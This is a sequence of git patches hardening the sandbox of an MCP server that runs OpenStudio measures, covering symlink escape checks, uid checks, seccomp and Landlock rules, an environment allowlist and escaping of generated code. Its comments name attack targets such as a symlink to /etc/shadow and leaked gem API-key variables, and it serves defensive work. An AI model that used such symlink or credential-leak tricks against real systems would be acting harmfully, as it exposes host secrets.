+++ b/mcp_server/util.py
@@ -1,10 +1,37 @@
 from __future__ import annotations
 
 import json
+import os
 import shutil
 from pathlib import Path
 
 
+def reject_escaping_symlinks(root: Path) -> str | None:
+    """Return an error string if the directory tree `root` contains a symlink
+    whose target resolves OUTSIDE `root`; else None.
+
+    Used before staging untrusted measure/OSW trees: a link to a host file
+    (e.g. -> /etc/shadow) must not be copied or executed. Internal symlinks are
+    allowed. Does not follow symlinked directories (no traversal / loops).
+    """
+    try:
+        rroot = str(root.resolve())
+    except OSError:
+        return f"Cannot resolve path: {root}"
+    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
+        for name in dirnames + filenames:
+            p = Path(dirpath) / name
+            if not p.is_symlink():
+                continue
+            try:
+                target = str(p.resolve())
+            except OSError:
+                return f"Broken symlink in staged tree: {name}"
+            if target != rroot and not target.startswith(rroot + os.sep):
+                return f"Symlink escapes the allowed directory (not allowed): {name}"
+    return None
+
+
 def safe_read_text(path: Path, max_bytes: int = 200_000) -> str:
     data = safe_read_bytes(path, max_bytes=max_bytes)
     return data.decode("utf-8", errors="replace")

From 838b6c3b6bd93dd480aac814f3b328912a53759a Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 07/26] fix(security): reject sandbox uid/gid <= 0 (Codex H5)

Never let a bad OSMCP_SANDBOX_UID override leave confined code as root.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/config.py | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/mcp_server/config.py b/mcp_server/config.py
index 61042be..56bbfc3 100644
--- a/mcp_server/config.py
+++ b/mcp_server/config.py
@@ -80,8 +80,15 @@ def _safe_float(env_val: str, default: float) -> float:
 
 # Unprivileged account confined subprocesses drop to (baked into the image as
 # `sandbox`). See mcp_server/_sandbox_exec.py.
-SANDBOX_UID = _safe_int(os.environ.get("OSMCP_SANDBOX_UID", "1001"), 1001)
-SANDBOX_GID = _safe_int(os.environ.get("OSMCP_SANDBOX_GID", "1001"), 1001)
+def _safe_sandbox_id(env_val: str, default: int) -> int:
+    """A positive uid/gid. Rejects <=0 (esp. 0=root) so a bad override can never
+    leave confined code running as root after the setuid 'drop'."""
+    v = _safe_int(env_val, default)
+    return v if v > 0 else default
+
+
+SANDBOX_UID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_UID", "1001"), 1001)
+SANDBOX_GID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_GID", "1001"), 1001)
 
 # rlimit backstops for confined subprocesses (0 = off). Generous by design — they
 # catch runaway bombs, not tune normal use. CPU/AS default off: a CPU-second cap

From a27f41f00e737a27d11ef399ffbcbabee7a67126 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 08/26] fix(security): seccomp KILL unexpected arch + x32, deny
 io_uring_setup (Codex H1)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/_seccomp.py | 55 ++++++++++++++++++++++++++++--------------
 1 file changed, 37 insertions(+), 18 deletions(-)

diff --git a/mcp_server/_seccomp.py b/mcp_server/_seccomp.py
index cdf809b..f80342c 100644
--- a/mcp_server/_seccomp.py
+++ b/mcp_server/_seccomp.py
@@ -20,20 +20,26 @@
 # BPF opcodes
 _BPF_LD_W_ABS = 0x00 | 0x00 | 0x20   # BPF_LD | BPF_W | BPF_ABS
 _BPF_JEQ_K = 0x05 | 0x10 | 0x00      # BPF_JMP | BPF_JEQ | BPF_K
+_BPF_JSET_K = 0x05 | 0x40 | 0x00     # BPF_JMP | BPF_JSET | BPF_K (bit test)
 _BPF_RET_K = 0x06 | 0x00             # BPF_RET | BPF_K
 
 # seccomp return actions
 _SECCOMP_RET_ALLOW = 0x7FFF0000
 _SECCOMP_RET_ERRNO = 0x00050000
+_SECCOMP_RET_KILL_PROCESS = 0x80000000
+_X32_SYSCALL_BIT = 0x40000000  # x86_64 x32 ABI marks syscall nrs with this bit
 
 # seccomp_data field offsets (nr@0, arch@4, ip@8, args[0]@16 ...; little-endian)
 _OFF_NR = 0
 _OFF_ARCH = 4
 _OFF_ARG0 = 16
 
-# AUDIT_ARCH + __NR_socket per arch
+# AUDIT_ARCH + syscall numbers per arch. io_uring_setup is blocked too: io_uring
+# can create/connect sockets via submission-queue ops, bypassing a socket()-only
+# filter — denying its setup closes that hole (no measure legitimately uses it).
 _AUDIT_ARCH = {"x86_64": 0xC000003E, "aarch64": 0xC00000B7}
 _NR_SOCKET = {"x86_64": 41, "aarch64": 198}
+_NR_IO_URING_SETUP = {"x86_64": 425, "aarch64": 425}  # generic syscall number
 
 _AF_INET = 2
 _AF_INET6 = 10
@@ -60,27 +66,40 @@ def install_net_deny() -> bool:
         return False
     audit_arch = _AUDIT_ARCH[mach]
     nr_socket = _NR_SOCKET[mach]
-    deny = _SECCOMP_RET_ERRNO | (errno.EAFNOSUPPORT & 0xFFFF)
-
-    # Instruction layout (jt/jf are offsets from the NEXT instruction):
-    #   0 load arch
-    #   1 arch == ours ? -> 2 : ALLOW(8)
-    #   2 load nr
-    #   3 nr == socket ? -> 4 : ALLOW(8)
-    #   4 load args[0] (domain)
-    #   5 domain == AF_INET  ? DENY(7) : 6
-    #   6 domain == AF_INET6 ? DENY(7) : ALLOW(8)
-    #   7 RET deny
-    #   8 RET allow
+    nr_io_uring = _NR_IO_URING_SETUP[mach]
+    deny_net = _SECCOMP_RET_ERRNO | (errno.EAFNOSUPPORT & 0xFFFF)
+    deny_enosys = _SECCOMP_RET_ERRNO | (errno.ENOSYS & 0xFFFF)  # io_uring "unavailable"
+
+    # Instruction layout (jt/jf are offsets from the NEXT instruction). Unexpected
+    # architectures (e.g. a 32-bit i386 binary, different AUDIT_ARCH) and x32-ABI
+    # syscalls (x86_64 syscall nr with the 0x40000000 bit) are KILLed rather than
+    # allowed — otherwise they'd issue unfiltered socket() calls (fail-open).
+    #    0  load arch
+    #    1  arch == ours ?            -> 2          : KILL(9)
+    #    2  load nr
+    #    3  nr & x32_bit ?            -> KILL(9)    : 4
+    #    4  nr == io_uring_setup ?    -> ENOSYS(10) : 5
+    #    5  nr == socket ?            -> 6          : ALLOW(12)
+    #    6  load args[0] (domain)
+    #    7  domain == AF_INET  ?      -> DENY_NET(11): 8
+    #    8  domain == AF_INET6 ?      -> DENY_NET(11): ALLOW(12)
+    #    9  RET kill
+    #   10  RET enosys
+    #   11  RET deny_net (EAFNOSUPPORT)
+    #   12  RET allow
     program = b"".join([
         _stmt(_BPF_LD_W_ABS, _OFF_ARCH),
-        _jump(_BPF_JEQ_K, audit_arch, 0, 6),
+        _jump(_BPF_JEQ_K, audit_arch, 0, 7),
         _stmt(_BPF_LD_W_ABS, _OFF_NR),
-        _jump(_BPF_JEQ_K, nr_socket, 0, 4),
+        _jump(_BPF_JSET_K, _X32_SYSCALL_BIT, 5, 0),
+        _jump(_BPF_JEQ_K, nr_io_uring, 5, 0),
+        _jump(_BPF_JEQ_K, nr_socket, 0, 6),
         _stmt(_BPF_LD_W_ABS, _OFF_ARG0),
-        _jump(_BPF_JEQ_K, _AF_INET, 1, 0),
-        _jump(_BPF_JEQ_K, _AF_INET6, 0, 1),
-        _stmt(_BPF_RET_K, deny),
+        _jump(_BPF_JEQ_K, _AF_INET, 3, 0),
+        _jump(_BPF_JEQ_K, _AF_INET6, 2, 3),
+        _stmt(_BPF_RET_K, _SECCOMP_RET_KILL_PROCESS),
+        _stmt(_BPF_RET_K, deny_enosys),
+        _stmt(_BPF_RET_K, deny_net),
         _stmt(_BPF_RET_K, _SECCOMP_RET_ALLOW),
     ])
     n = len(program) // 8

From cce16737c724957846cc6eb396977f16e2151f91 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 09/26] fix(security): Landlock IOCTL_DEV (ABI>=5) +
 fail-closed add_rule (Codex H4/M1)

Also documents the packed path_beneath struct (rebuts Copilot #7).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/_landlock.py | 27 ++++++++++++++++++++++-----
 1 file changed, 22 insertions(+), 5 deletions(-)

diff --git a/mcp_server/_landlock.py b/mcp_server/_landlock.py
index c143109..7d0a784 100644
--- a/mcp_server/_landlock.py
+++ b/mcp_server/_landlock.py
@@ -37,6 +37,7 @@
 _A_MAKE_SYM = 1 << 12
 _A_REFER = 1 << 13      # ABI >= 2
 _A_TRUNCATE = 1 << 14   # ABI >= 3
+_A_IOCTL_DEV = 1 << 15  # ABI >= 5 — governs ioctl() on device files
 
 _RO = _A_EXECUTE | _A_READ_FILE | _A_READ_DIR
 _RW_BASE = (
@@ -53,6 +54,12 @@ class _RulesetAttr(ctypes.Structure):
 
 
 class _PathBeneathAttr(ctypes.Structure):
+    # MUST be packed (12 bytes). The kernel UAPI declares
+    #   struct landlock_path_beneath_attr { __u64 allowed_access; __s32 parent_fd; }
+    #   __attribute__((packed));
+    # so _pack_=1 matches the kernel exactly. Do NOT "fix" this to natural
+    # alignment (16 bytes) — that would mismatch the kernel struct. Verified by
+    # the integration tests, which only pass if add_rule parsed this correctly.
     _pack_ = 1
     _fields_ = [("allowed_access", ctypes.c_uint64), ("parent_fd", ctypes.c_int32)]
 
@@ -74,27 +81,37 @@ def restrict(ro_paths: list[str], rw_paths: list[str]) -> int:
         handled |= _A_REFER
     if abi >= 3:
         handled |= _A_TRUNCATE
+    if abi >= 5:
+        handled |= _A_IOCTL_DEV  # govern device ioctls (esp. with /dev writable)
 
     attr = _RulesetAttr(handled_access_fs=handled)
     rs_fd = libc.syscall(_NR_CREATE_RULESET, ctypes.byref(attr), ctypes.sizeof(attr), 0)
     if rs_fd < 0:
         return 0
 
-    def _add(path: str, access: int) -> None:
+    def _add(path: str, access: int) -> bool:
+        """True if the path is absent (optional, skip) or its rule was added;
+        False only if a PRESENT path's rule failed (a broken ruleset)."""
         try:
             fd = os.open(path, os.O_PATH | os.O_CLOEXEC)
         except OSError:
-            return  # path absent — skip
+            return True  # absent path — optional, not a failure
         try:
             pba = _PathBeneathAttr(allowed_access=access & handled, parent_fd=fd)
-            libc.syscall(_NR_ADD_RULE, rs_fd, _RULE_PATH_BENEATH, ctypes.byref(pba), 0)
+            return libc.syscall(_NR_ADD_RULE, rs_fd, _RULE_PATH_BENEATH, ctypes.byref(pba), 0) == 0
         finally:
             os.close(fd)
 
+    ok = True
     for p in ro_paths:
-        _add(p, _RO)
+        ok = _add(p, _RO) and ok
     for p in rw_paths:
-        _add(p, handled)  # full set for the writable run dir
+        ok = _add(p, handled) and ok  # full set for the writable run dir
+    if not ok:
+        # A present path's rule was rejected → enforce nothing rather than a
+        # half-applied policy; the caller (auto tier) fails closed on a 0 return.
+        os.close(rs_fd)
+        return 0
 
     # no_new_privs is set by the caller; restrict_self enforces the ruleset on
     # this process and everything it execs/forks.

From 60373e873fc59811434e29d0adc837092461a4c2 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 10/26] fix(security): fail-closed when Landlock/seccomp cannot
 engage (Codex H2)

Load the landlock/seccomp shims before applying the FS restriction; refresh docstring.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/_sandbox_exec.py | 45 +++++++++++++++++++++++--------------
 1 file changed, 28 insertions(+), 17 deletions(-)

diff --git a/mcp_server/_sandbox_exec.py b/mcp_server/_sandbox_exec.py
index 03bdb6f..36eb1e3 100644
--- a/mcp_server/_sandbox_exec.py
+++ b/mcp_server/_sandbox_exec.py
@@ -4,14 +4,17 @@
 
     python3 -m mcp_server._sandbox_exec --uid N --gid N \
         [--rlimit-fsize BYTES] [--rlimit-nproc N] [--rlimit-nofile N] \
-        [--rlimit-cpu SECONDS] [--rlimit-as BYTES] -- CMD [ARG...]
-
-Runs as root, applies rlimits, drops to the unprivileged uid/gid, sets
-``no_new_privs``, then ``execvp``s CMD. A standalone exec — NOT a Popen
-``preexec_fn`` — so there is no fork-safety hazard in the threaded server, and
-the dropped image keeps the same pid (so the dispatcher's existing
-terminate/kill-by-pid path still works). Landlock FS rules + a seccomp net-deny
-filter will be added here in the next increment, behind the same wrapper.
+        [--rlimit-cpu SECONDS] [--rlimit-as BYTES] \
+        [--landlock-ro PATH ...] [--landlock-rw PATH ...] [--seccomp-net] \
+        -- CMD [ARG...]
+
+Applies, in order: rlimits, ``prctl(no_new_privs)``, Landlock FS policy and a
+seccomp network-deny filter (when their flags are given), then drops to the
+unprivileged uid/gid **only when running as root** (a non-root local server keeps
+its uid — the FS/network confinement is unprivileged and still applies), and
+finally ``execvp``s CMD. A standalone exec — NOT a Popen ``preexec_fn`` — so
+there is no fork-safety hazard in the threaded server, and the exec'd image keeps
+the same pid (so the dispatcher's terminate/kill-by-pid path still works).
 """
 from __future__ import annotations
 
@@ -21,6 +24,10 @@
 import resource
 import sys
 
+# Imported up-front (before any Landlock restriction is applied below) so the
+# module files are read while the filesystem is still unconfined.
+from mcp_server import _landlock, _seccomp
+
 _RLIMITS = {
     "cpu": resource.RLIMIT_CPU,        # CPU-seconds
     "fsize": resource.RLIMIT_FSIZE,    # max single-file bytes
@@ -78,15 +85,19 @@ def main(argv: list[str]) -> int:
     # both persist across setuid + exec and are inherited by children). Degrade
     # loudly — a backend that cannot engage prints a notice and the run proceeds
     # with whatever confinement did apply (the POSIX floor always holds).
-    if ns.landlock_ro or ns.landlock_rw:
-        from mcp_server import _landlock
-        abi = _landlock.restrict(ns.landlock_ro, ns.landlock_rw)
-        if not abi:
-            print("sandbox-exec: WARNING Landlock unavailable — FS not confined", file=sys.stderr)
-    if ns.seccomp_net:
-        from mcp_server import _seccomp
-        if not _seccomp.install_net_deny():
-            print("sandbox-exec: WARNING seccomp net-deny unavailable — network not confined", file=sys.stderr)
+    # Fail CLOSED: if a kernel backend was requested (auto/full tier) but cannot
+    # engage, refuse to run rather than execute untrusted code unconfined. An
+    # operator who knowingly wants weaker confinement selects OSMCP_SANDBOX=posix
+    # (UID drop + rlimits, no kernel FS/net) or off — neither requests these flags.
+    if (ns.landlock_ro or ns.landlock_rw) and not _landlock.restrict(ns.landlock_ro, ns.landlock_rw):
+        print("sandbox-exec: FATAL Landlock requested but unavailable — refusing to run "
+              "unconfined (use OSMCP_SANDBOX=posix or off to accept weaker confinement)",
+              file=sys.stderr)
+        return 3
+    if ns.seccomp_net and not _seccomp.install_net_deny():
+        print("sandbox-exec: FATAL seccomp net-deny requested but unavailable — refusing to "
+              "run unconfined (use OSMCP_SANDBOX=posix or off)", file=sys.stderr)
+        return 3
 
     # Drop privileges only when we have them (root). The FS/network confinement
     # above is unprivileged and already applied — so a non-root local server still

From b51d237bb6178c73d13c8ce9f7ddce902d8c51d2 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 11/26] fix(security): respect OSMCP_SANDBOX_NET, symlink-safe
 chown, tighten env, drop /repo (Codex H3)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/sandbox.py | 68 ++++++++++++++++++++++++++++---------------
 1 file changed, 45 insertions(+), 23 deletions(-)

diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 95084d7..556a1bc 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -5,20 +5,21 @@
 They used to inherit the server's full environment via ``os.environ.copy()``.
 This module is the single chokepoint that confines them.
 
-`OSMCP_SANDBOX` (config.SANDBOX_MODE) selects the mode:
-  off    — full passthrough (current behaviour / explicit escape hatch)
-  posix  — clean-env allowlist (this increment); UID drop + rlimits + Landlock
-           FS policy + seccomp net-deny arrive in later increments, same knob
-  auto   — best confinement available (currently == posix)
+`OSMCP_SANDBOX` (config.SANDBOX_MODE) selects the mode (default `auto`):
+  off    — full passthrough (explicit escape hatch for trusted/local-tooling use)
+  posix  — clean-env allowlist + UID drop (when root) + rlimits
+  auto   — best available: posix + Landlock FS policy + seccomp net-deny (Linux)
 
 `off` is a true passthrough so an operator can deliberately disable confinement
 (the Codex ``danger-full-access`` model); the security PoC suite pins it to prove
 the holes still exist when off.
 
-Increment status: clean-env floor (build_env) + UID drop & rlimits (wrap_cmd /
-prepare_workdir, via _sandbox_exec). Landlock FS rules + seccomp net-deny land in
-_sandbox_exec next. `active_tier()` reports what is in effect so degradation is
-visible (never silent).
+The unprivileged layers (clean-env, Landlock, seccomp, rlimits) apply even when
+the server runs non-root; only the UID drop is root-gated and skipped otherwise.
+`OSMCP_SANDBOX_NET=allow` opts out of the network deny. On a platform with no
+kernel backend (macOS/Windows bare installs) `wrap_cmd` degrades to clean-env
+only and warns once. `active_tier()` reports what is actually in effect so
+degradation is visible (never silent).
 """
 from __future__ import annotations
 
@@ -33,6 +34,7 @@
     INPUT_ROOT,
     SANDBOX_GID,
     SANDBOX_MODE,
+    SANDBOX_NET,
     SANDBOX_RLIMIT_AS,
     SANDBOX_RLIMIT_CPU,
     SANDBOX_RLIMIT_FSIZE,
@@ -62,8 +64,13 @@
     "COMSTOCK_MEASURES_DIR", "COMMON_MEASURES_DIR", "SKILLS_DIR",
     "OSCLI_GEMFILE", "OSCLI_GEM_PATH",
     "OSMCP_RUN_ROOT", "OPENSTUDIO_MCP_RUN_ROOT",
+    # Bundler / RubyGems config — EXPLICIT safe names only. A broad BUNDLE_/GEM_
+    # prefix would leak credential vars (e.g. GEM_HOST_API_KEY, or per-host
+    # BUNDLE_<HOST>__<COM> auth tokens) into untrusted measure code.
+    "BUNDLE_WITHOUT", "BUNDLE_PATH", "BUNDLE_GEMFILE", "BUNDLE_FROZEN",
+    "BUNDLE_DEPLOYMENT", "GEM_HOME", "GEM_PATH",
 })
-_ENV_ALLOW_PREFIXES = ("BUNDLE_", "GEM_", "LC_")
+_ENV_ALLOW_PREFIXES = ("LC_",)  # locale only (e.g. LC_CTYPE); never a secret prefix
 
 
 def enabled() -> bool:
@@ -91,11 +98,16 @@ def active_tier() -> str:
 
 
 def _ro_paths() -> list[str]:
-    """Read-only roots the confined subprocess may read/execute."""
+    """Read-only roots the confined subprocess may read/execute.
+
+    /repo is deliberately NOT granted: the measure runs from the copied run dir,
+    and the shim imports mcp_server before applying Landlock — so the run never
+    needs to read the source tree (which could hold a host .env).
+    """
     return [
         *_RO_SYSTEM,
         str(COMSTOCK_MEASURES_DIR), str(COMMON_MEASURES_DIR),
-        str(INPUT_ROOT), str(SKILLS_DIR), "/repo",
+        str(INPUT_ROOT), str(SKILLS_DIR),
     ]
 
 
@@ -130,15 +142,20 @@ def build_env(work_dir: Path | str, *, redirect_tmp: bool = True) -> dict[str, s
     return env
 
 
-def wrap_cmd(cmd: list[str], work_dir: Path | str) -> list[str]:
+def wrap_cmd(cmd: list[str], work_dir: Path | str,
+             extra_rw: tuple[str, ...] = ()) -> list[str]:
     """Wrap a subprocess argv to run under the privilege-dropping exec shim.
 
     Disabled → returns the command unchanged (today's behaviour). Enabled → runs
     it via `python3 -m mcp_server._sandbox_exec`, which drops to the unprivileged
-    sandbox uid, applies rlimits, sets no_new_privs, then execs the command (so
-    the pid is preserved and the dispatcher's kill-by-pid path still works).
-    Full tier additionally confines the filesystem (Landlock: read-only system
-    roots, writable only `work_dir`) and denies outbound IP networking (seccomp).
+    sandbox uid (when root), applies rlimits, sets no_new_privs, then execs the
+    command (the pid is preserved so the dispatcher's kill-by-pid path still
+    works). Full tier additionally confines the filesystem (Landlock: read-only
+    system roots, writable only `work_dir` + `extra_rw`) and — unless
+    OSMCP_SANDBOX_NET=allow — denies outbound IP networking (seccomp).
+
+    extra_rw: additional writable Landlock roots (e.g. a private TMPDIR off the
+    bind mount for tools that need unlinked tempfiles).
     """
     if not enabled():
         return list(cmd)
@@ -168,11 +185,14 @@ def wrap_cmd(cmd: list[str], work_dir: Path | str) -> list[str]:
     if _full():
         for path in _ro_paths():
             wrapped += ["--landlock-ro", path]
-        # rw: the run dir, plus /dev for /dev/null & /dev/urandom (node creation
-        # there is still barred by DAC for the unprivileged uid).
-        for path in (str(work_dir), "/dev"):
+        # rw: the run dir (+ caller extras), plus /dev for /dev/null & /dev/urandom
+        # (node creation there is still barred by DAC for the unprivileged uid).
+        for path in (str(work_dir), "/dev", *extra_rw):
             wrapped += ["--landlock-rw", path]
-        wrapped += ["--seccomp-net"]
+        # Network deny is the default; OSMCP_SANDBOX_NET=allow opts out (trusted
+        # deployments that legitimately fetch e.g. BCL components).
+        if SANDBOX_NET != "allow":
+            wrapped += ["--seccomp-net"]
     return [*wrapped, "--", *cmd]
 
 
@@ -189,8 +209,10 @@ def prepare_workdir(work_dir: Path | str) -> None:
     if not enabled() or not (hasattr(os, "geteuid") and os.geteuid() == 0):
         return
     work = Path(work_dir)
+    # follow_symlinks=False (lchown): never let a symlink inside the dir redirect
+    # the chown to a target outside it (symlink-traversal privilege issue).
     with contextlib.suppress(OSError):
-        os.chown(work, SANDBOX_UID, SANDBOX_GID)
+        os.chown(work, SANDBOX_UID, SANDBOX_GID, follow_symlinks=False)
     for path in work.rglob("*"):
         with contextlib.suppress(OSError):
-            os.chown(path, SANDBOX_UID, SANDBOX_GID)
+            os.chown(path, SANDBOX_UID, SANDBOX_GID, follow_symlinks=False)

From cca968178ed6585669d32e08043c81bfea0ae954 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 12/26] fix(security): apply_measure rejects escaping symlinks,
 stages symlinks=True (Codex C3)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/skills/measures/operations.py | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/mcp_server/skills/measures/operations.py b/mcp_server/skills/measures/operations.py
index e4f1e63..1a98961 100644
--- a/mcp_server/skills/measures/operations.py
+++ b/mcp_server/skills/measures/operations.py
@@ -24,7 +24,7 @@
     user_run_root,
 )
 from mcp_server.model_manager import get_model, load_model
-from mcp_server.util import resolve_run_dir
+from mcp_server.util import reject_escaping_symlinks, resolve_run_dir
 
 
 def list_measure_arguments(measure_dir: str) -> dict[str, Any]:
@@ -153,6 +153,14 @@ def apply_measure(
         if not is_path_allowed(measure_path):
             return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"}
 
+        # Reject symlinks that escape the measure dir: copytree(symlinks=True)
+        # below preserves links instead of inlining target content, but a link
+        # pointing outside the measure root (e.g. -> /etc/shadow) must not be
+        # staged at all (it would leak host files into the readable run dir).
+        err = reject_escaping_symlinks(measure_path)
+        if err:
+            return {"ok": False, "error": err}
+
         # Check measure script exists (Ruby or Python)
         has_rb = (measure_path / "measure.rb").is_file()
         has_py = (measure_path / "measure.py").is_file()
@@ -173,7 +181,9 @@ def apply_measure(
         measures_dir = run_dir / "measures"
         measures_dir.mkdir(exist_ok=True)
         local_measure = measures_dir / measure_path.name
-        shutil.copytree(str(measure_path), str(local_measure), dirs_exist_ok=True)
+        # symlinks=True: copy links AS links (don't follow → no host-file content
+        # inlined into the run dir); escaping links already rejected above.
+        shutil.copytree(str(measure_path), str(local_measure), dirs_exist_ok=True, symlinks=True)
 
         # Build measure step arguments
         measure_args = {}

From 37cd3b80549e4de53cebc7a1b257d9e337dbae21 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 17:40:53 -0400
Subject: [PATCH 13/26] fix(security): validate test_measure paths;
 escape/validate generated arg code; confine reporting-measure test (Codex
 C5/C2/C1)

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 .../skills/measure_authoring/operations.py    | 97 +++++++++++++------
 1 file changed, 67 insertions(+), 30 deletions(-)

diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index df386b4..39bd079 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -8,13 +8,15 @@
 import re
 import shutil
 import subprocess
+import tempfile
 from pathlib import Path
 from typing import Any
 
 import openstudio
 
 from mcp_server import sandbox
-from mcp_server.config import INPUT_ROOT, user_run_root
+from mcp_server.config import INPUT_ROOT, is_path_allowed, user_run_root
+from mcp_server.util import reject_escaping_symlinks
 
 
 def custom_measures_dir() -> Path:
@@ -29,6 +31,9 @@ def custom_measures_dir() -> Path:
 ]
 
 _MEASURE_NAME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9_]{0,99}$")
+# Argument names become bare Ruby/Python identifiers in generated code — they must
+# be plain identifiers, never arbitrary text (else code injection at generation).
+_ARG_NAME_RE = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_]{0,63}$")
 
 # Argument type -> SDK factory method name suffix
 _ARG_MAKERS = {
@@ -91,6 +96,15 @@ def _escape_python_str(s: str) -> str:
     return s.replace("\\", "\\\\").replace('"', '\\"')
 
 
+def _checked_arg_name(name: str) -> str:
+    """Validate an argument name as a plain identifier — it is emitted as a bare
+    Ruby/Python variable in generated code, so arbitrary text would be code
+    injection. Raises ValueError otherwise (callers wrap in ok:false)."""
+    if not isinstance(name, str) or not _ARG_NAME_RE.match(name):
+        raise ValueError(f"invalid argument name (must be an identifier): {name!r}")
+    return name
+
+
 def _generate_ruby_arguments(args: list[dict]) -> str:
     """Generate Ruby arguments() method body."""
     lines = [
@@ -98,28 +112,26 @@ def _generate_ruby_arguments(args: list[dict]) -> str:
         "    args = OpenStudio::Measure::OSArgumentVector.new",
     ]
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])  # bare Ruby identifier — validated, never raw text
         atype = a.get("type", "String")
         required = a.get("required", True)
         req_str = "true" if required else "false"
         maker = _ARG_MAKERS.get(atype, "String")
         if atype == "Choice" and "values" in a:
-            # Choice args require values at construction time
-            vals = a["values"]
-            choices_arr = ", ".join(f'"{v}"' for v in vals)
+            # Choice args require values at construction time (escape each value)
             lines.append(f"    {name}_choices = OpenStudio::StringVector.new")
-            for v in vals:
-                lines.append(f'    {name}_choices << "{v}"')
+            for v in a["values"]:
+                lines.append(f'    {name}_choices << "{_escape_ruby_str(str(v))}"')
             lines.append(f'    {name} = OpenStudio::Measure::OSArgument.makeChoiceArgument("{name}", {name}_choices, {name}_choices, {req_str})')
         else:
             lines.append(f'    {name} = OpenStudio::Measure::OSArgument.make{maker}Argument("{name}", {req_str})')
         if "display_name" in a:
-            lines.append(f'    {name}.setDisplayName("{a["display_name"]}")')
+            lines.append(f'    {name}.setDisplayName("{_escape_ruby_str(str(a["display_name"]))}")')
         else:
             display = name.replace("_", " ").title()
             lines.append(f'    {name}.setDisplayName("{display}")')
         if "description" in a:
-            lines.append(f'    {name}.setDescription("{a["description"]}")')
+            lines.append(f'    {name}.setDescription("{_escape_ruby_str(str(a["description"]))}")')
         if "default_value" in a:
             dv = a["default_value"]
             if atype == "Double":
@@ -129,7 +141,7 @@ def _generate_ruby_arguments(args: list[dict]) -> str:
             elif atype == "Boolean":
                 lines.append(f"    {name}.setDefaultValue({str(dv).lower()})")
             else:
-                lines.append(f'    {name}.setDefaultValue("{dv}")')
+                lines.append(f'    {name}.setDefaultValue("{_escape_ruby_str(str(dv))}")')
         lines.append(f"    args << {name}")
     lines += ["    return args", "  end"]
     return "\n".join(lines)
@@ -142,27 +154,26 @@ def _generate_python_arguments(args: list[dict]) -> str:
         "        args = openstudio.measure.OSArgumentVector()",
     ]
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])  # bare Python identifier — validated, never raw text
         atype = a.get("type", "String")
         required = a.get("required", True)
         req_str = "True" if required else "False"
         maker = _ARG_MAKERS.get(atype, "String")
         if atype == "Choice" and "values" in a:
-            # Choice args require values at construction time
-            vals = a["values"]
+            # Choice args require values at construction time (escape each value)
             lines.append(f"        {name}_choices = openstudio.StringVector()")
-            for v in vals:
-                lines.append(f'        {name}_choices.append("{v}")')
+            for v in a["values"]:
+                lines.append(f'        {name}_choices.append("{_escape_python_str(str(v))}")')
             lines.append(f'        {name} = openstudio.measure.OSArgument.makeChoiceArgument("{name}", {name}_choices, {name}_choices, {req_str})')
         else:
             lines.append(f'        {name} = openstudio.measure.OSArgument.make{maker}Argument("{name}", {req_str})')
         if "display_name" in a:
-            lines.append(f'        {name}.setDisplayName("{a["display_name"]}")')
+            lines.append(f'        {name}.setDisplayName("{_escape_python_str(str(a["display_name"]))}")')
         else:
             display = name.replace("_", " ").title()
             lines.append(f'        {name}.setDisplayName("{display}")')
         if "description" in a:
-            lines.append(f'        {name}.setDescription("{a["description"]}")')
+            lines.append(f'        {name}.setDescription("{_escape_python_str(str(a["description"]))}")')
         if "default_value" in a:
             dv = a["default_value"]
             if atype == "Double":
@@ -172,7 +183,7 @@ def _generate_python_arguments(args: list[dict]) -> str:
             elif atype == "Boolean":
                 lines.append(f"        {name}.setDefaultValue({dv!s})")
             else:
-                lines.append(f'        {name}.setDefaultValue("{dv}")')
+                lines.append(f'        {name}.setDefaultValue("{_escape_python_str(str(dv))}")')
         lines.append(f"        args.append({name})")
     lines += ["        return args"]
     return "\n".join(lines)
@@ -182,7 +193,7 @@ def _generate_ruby_extraction(args: list[dict]) -> str:
     """Generate Ruby argument extraction lines for run() method."""
     lines = []
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])
         atype = a.get("type", "String")
         # Choice args are extracted as strings at runtime
